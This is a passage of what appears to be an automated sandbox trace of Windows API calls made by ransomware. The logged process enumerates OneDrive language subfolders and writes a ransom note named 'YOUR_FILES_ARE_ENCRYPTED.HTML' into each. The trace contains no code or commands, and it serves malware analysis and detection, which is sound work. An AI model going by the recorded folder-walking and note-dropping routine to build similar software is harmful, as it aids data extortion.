nFileSizeHigh=0x0, nFileSizeLow=0x12ea8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.895] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mk\\FileSync.LocalizedResources.dll.mui") returned 110 [0161.895] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.895] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.895] lstrlenW (lpString=".mui") returned 4 [0161.895] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.895] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa6160e30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6160e30, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6160e30, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ea8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.895] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.895] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mk\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0161.895] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mk\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\mk\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.895] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.898] CloseHandle (hObject=0x5b8) returned 1 [0161.898] GetProcessHeap () returned 0x270000 [0161.899] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.899] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6160e30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6350010, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6350010, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ml-in", cAlternateFileName="")) returned 1 [0161.899] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ml-in") returned 77 [0161.899] GetProcessHeap () returned 0x270000 [0161.899] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.899] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ml-in" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ml-in") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ml-in" [0161.899] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ml-in", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ml-in\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ml-in\\*" [0161.899] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ml-in\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6160e30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6350010, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6350010, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.900] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6160e30, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6350010, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6350010, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.900] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa6350010, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6350010, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6350010, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x14eb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.900] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ml-in\\FileSync.LocalizedResources.dll.mui") returned 113 [0161.900] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.900] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.900] lstrlenW (lpString=".mui") returned 4 [0161.900] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.900] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa6350010, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6350010, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6350010, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x14eb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.900] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.900] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ml-in\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 107 [0161.900] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ml-in\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\ml-in\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.901] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.903] CloseHandle (hObject=0x5b8) returned 1 [0161.904] GetProcessHeap () returned 0x270000 [0161.904] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.904] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6350010, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa65d7770, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa65d7770, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="mn", cAlternateFileName="")) returned 1 [0161.920] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mn") returned 74 [0161.920] GetProcessHeap () returned 0x270000 [0161.920] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.920] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mn" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mn") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mn" [0161.920] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mn", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mn\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mn\\*" [0161.920] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mn\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6350010, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa65d7770, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa65d7770, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.921] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa6350010, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa65d7770, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa65d7770, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.921] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa65d7770, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa65d7770, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa65d7770, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ca8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.921] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mn\\FileSync.LocalizedResources.dll.mui") returned 110 [0161.921] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.921] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.921] lstrlenW (lpString=".mui") returned 4 [0161.921] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.921] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa65d7770, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa65d7770, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa65d7770, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12ca8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.921] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.921] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mn\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0161.921] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mn\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\mn\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.922] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.924] CloseHandle (hObject=0x5b8) returned 1 [0161.925] GetProcessHeap () returned 0x270000 [0161.926] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.926] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa65d7770, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa67c6950, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa67c6950, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="mr", cAlternateFileName="")) returned 1 [0161.926] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mr") returned 74 [0161.926] GetProcessHeap () returned 0x270000 [0161.926] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.926] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mr" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mr") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mr" [0161.926] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mr", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mr\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mr\\*" [0161.926] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mr\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa65d7770, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa67c6950, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa67c6950, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.926] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa65d7770, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa67c6950, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa67c6950, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.927] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa67c6950, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa67c6950, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa67c6950, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12aa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.927] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mr\\FileSync.LocalizedResources.dll.mui") returned 110 [0161.927] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.927] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.927] lstrlenW (lpString=".mui") returned 4 [0161.927] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.927] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa67c6950, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa67c6950, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa67c6950, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12aa8, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.927] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.927] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mr\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0161.927] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\mr\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\mr\\your_files_are_encrypted.html"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x5b8 [0161.928] WriteFile (in: hFile=0x5b8, lpBuffer=0x44fe028*, nNumberOfBytesToWrite=0x3c00, lpNumberOfBytesWritten=0x4ebd1f0, lpOverlapped=0x0 | out: lpBuffer=0x44fe028*, lpNumberOfBytesWritten=0x4ebd1f0*=0x3c00, lpOverlapped=0x0) returned 1 [0161.930] CloseHandle (hObject=0x5b8) returned 1 [0161.931] GetProcessHeap () returned 0x270000 [0161.932] HeapFree (in: hHeap=0x270000, dwFlags=0x0, lpMem=0x74d2010 | out: hHeap=0x270000) returned 1 [0161.932] FindNextFileW (in: hFindFile=0x42f3240, lpFindFileData=0x4ebd230 | out: lpFindFileData=0x4ebd230*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa67c6950, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6a4e0b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6a4e0b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x60, cFileName="ms", cAlternateFileName="")) returned 1 [0161.932] wnsprintfW (in: pszDest=0x74c2008, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ms") returned 74 [0161.932] GetProcessHeap () returned 0x270000 [0161.932] RtlAllocateHeap (HeapHandle=0x270000, Flags=0x8, Size=0x10000) returned 0x74d2010 [0161.932] lstrcpyW (in: lpString1=0x74d2010, lpString2="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ms" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ms") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ms" [0161.932] lstrcatW (in: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ms", lpString2="\\*" | out: lpString1="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ms\\*") returned="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ms\\*" [0161.932] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ms\\*", lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa67c6950, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6a4e0b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6a4e0b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x42f3280 [0161.932] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0xa67c6950, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6a4e0b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6a4e0b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0161.932] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa6a4e0b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6a4e0b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6a4e0b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12cb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 1 [0161.932] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ms\\FileSync.LocalizedResources.dll.mui") returned 110 [0161.933] lstrcmpW (lpString1="FileSync.LocalizedResources.dll.mui", lpString2="YOUR_FILES_ARE_ENCRYPTED.HTML") returned -1 [0161.933] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.933] lstrlenW (lpString=".mui") returned 4 [0161.933] PathFindExtensionW (pszPath="FileSync.LocalizedResources.dll.mui") returned=".mui" [0161.933] FindNextFileW (in: hFindFile=0x42f3280, lpFindFileData=0x4ebcf24 | out: lpFindFileData=0x4ebcf24*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa6a4e0b0, ftCreationTime.dwHighDateTime=0x1d709b9, ftLastAccessTime.dwLowDateTime=0xa6a4e0b0, ftLastAccessTime.dwHighDateTime=0x1d709b9, ftLastWriteTime.dwLowDateTime=0xa6a4e0b0, ftLastWriteTime.dwHighDateTime=0x1d709b9, nFileSizeHigh=0x0, nFileSizeLow=0x12cb0, dwReserved0=0x0, dwReserved1=0x0, cFileName="FileSync.LocalizedResources.dll.mui", cAlternateFileName="FILESY~1.MUI")) returned 0 [0161.933] FindClose (in: hFindFile=0x42f3280 | out: hFindFile=0x42f3280) returned 1 [0161.933] wnsprintfW (in: pszDest=0x74d2010, cchDest=32768, pszFmt="%ls\\%ls" | out: pszDest="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ms\\YOUR_FILES_ARE_ENCRYPTED.HTML") returned 104 [0161.933] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5AlR3U30D3\\AppData\\Local\\Microsoft\\OneDrive\\17.3.4604.0120\\ms\\YOUR_FILES_ARE_ENCRYPTED.HTML" (normalized: "c:\\users\\5alr3u30d3\\appdata\\local\\microsoft\\onedrive\\17.3.4604.0120\\ms\\your_files_are_encrypted.html"), 